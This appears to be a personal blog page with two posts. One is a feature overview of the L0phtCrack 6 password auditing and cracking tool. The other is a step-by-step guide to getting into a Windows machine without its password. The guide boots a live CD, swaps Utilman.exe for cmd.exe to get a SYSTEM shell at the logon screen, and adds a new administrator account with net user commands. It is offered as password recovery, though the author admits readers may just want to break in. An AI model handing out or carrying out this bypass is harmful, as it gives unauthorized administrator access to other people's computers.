PaulSpoerry.com

The legendary L0phtcrack password cracker is returning and in the form of a new version 6. L0phtCrack disappeared from the market after @stake, a company which was formed by L0pht Heavy Industries and others, was taken over by Symantec. At the beginning of this year the original L0phtCrack team bought back the software rights from Symantec and have now upgraded the tool.

L0phtCrack 6 is packed with powerful features such as scheduling, hash extraction from 64 bit Windows versions, multiprocessor algorithms, and networks monitoring and decoding. Yet it is still the easiest to use password auditing and recovery software available. Available in in L0phtcrack 6 is:

Password Scoring
L0phtCrack 6 provides a scoring metric to quickly assess password quality. Passwords are measured against current industry best practices, and are rated as Strong, Medium, Weak, or Fail.

Pre-computed Dictionary Support
Pre-computed password files is a must have feature in password auditing. L0phtCrack 6 supports pre-computed password hashes. Password audits now take minutes instead of hours or days.

Windows & Unix Password Support
L0phtCrack 6 imports and cracks Unix password files. Perform network audits from a single interface.

Remote password retrieval
L0phtCrack 6 has a built-in ability to import passwords from remote Windows, including 64-bit versions of Vista, Windows 7, and Unix machines, without requiring a third-party utility.

Scheduled Scans
System administrators can schedule routine audits with L0phtCrack 6. Audits can be performed daily, weekly, monthly, or just once, depending on the organization’s auditing requirements.

Remediation
L0phtCrack 6 offers remediation assistance to system administrators on how to take action against accounts that have poor passwords. Accounts can be disabled, or the passwords can be set to expire from within the L0phtCrack 6 interface. Remediation works for Windows user accounts only.

Updated Vista/Windows 7 Style UI
The user interface is improved and updated. More information is available about each user account, including password age, lock-out status, and whether the account is disabled, expired, or never expires. Information on L0phtCrack 6’s current session is provided in an “immediate window” with a reporting tab providing up-to-the-minute status of the current auditing session.

Executive Level Reporting
L0phtCrack 6 has real-time reporting that is displayed in a separate, tabbed interface. Auditing results are displayed based on auditing method, risk severity, and password character sets.

Password Risk Status
Displays risk status in four different categories: Empty, High Risk, Medium Risk, and Low Risk.

Password Audit Method
Displays the completion of all four methods L0phtCrack 6 uses: Dictionary, Hybrid, Precomputed, and Brute Force.

Password Character Sets
Reports the completion of the various character sets being audited, including, Alpha, Alphanumeric, Alphanumeric/Symbol, Alphanumeric/Symbol/International.

Password Length Distribution
Reports the overall length of the discovered password by account.

Summary Report
Password Statistics as Locked, Disabled, Expired, or if the password is older than 180 days. Audit Summary
Number of Accounts cracked and the number of Domains audited.

Foreign Password Cracking
L0phtCrack 6 supports foreign character sets for Brute Force, as well as foreign dictionary files. Pull down menus change for language and character set. L0phtCrack 6 ships with several foreign dictionaries.

Visit L0phtcrack to read more or download the latest version. You can also read my previous article “Ophcrack Live CD – Crack Windows passwords in minutes“.

Why hack Windows passwords when you can simply create yourself a new Administrator account?

In a previous post I showed how you can use an Ophcrack Live CD to crack Windows passwords in minutes. It works, I’ve done it before and it really works. The free, open source Ophcrack Live CD is a Windows account password cracking tool designed to help you recover lost Windows passwords. Quite a few people have sent me emails or chatted me via my website saying “I forgot my password”, or “my kid locked himself out of his pc”. I’m unsure if that’s really the case or if they were just looking for a way to crack Windows passwords. However, if that is really the case there is potentially a much faster way to resolve your issue… just create a new Administrator account!

To create a new Administrator account you’ll want to grab a copy of the Offensive Security’s BackTrack Live CD which can be found here.

What is BackTrack?

BackTrack is the result of the merging of two Innovative Penetration Testing live Linux distributions – Whax and Auditor. BackTrack has been dubbed as the best Security Live CD today, and has been rated 1st in its category, and 32nd overall in Insecure.org. Based on SLAX (Slackware), BackTrack provides user modularity. This means the distribution can be easily customised by the user to include personal scripts, additional tools, customized kernels, etc.

BackTrack Terminal Window

Here’s a quick and dirty way to make a new user account.

Boot into Backtrack and open a shell prompt:

• cd /mnt (change directory to mounted drives)

• ls (get the list of mounted drives)

• cd sda1 (sda1 is the main hard drive)

• cd Windows/ (change to the windows directory)

• cd System32/ (change to the system directory)

• mv Utilman.exe Utilman.old (backup original file)

• cp cmd.exe Utilman.exe (copy cmd.exe as utilman.exe)

• reboot

Once rebooted, at vista logon screen do the following:

• Press Windows key + U

• To invoke Utility Manager ( A.K.A. CMD.exe)

• Cmd.exe will spawn with ‘System’ privileges.

• c:\>net user S00perAdmin mypassword /add

• c:\>net localgroup administrators S00perAdmin /add

• Reboot and log in with your newly added Admin account

There ya go… now instead of needing to “crack” you “lost” password you can simply create a new Administrator account, login with that and then change the lost accounts password to what you want it to be.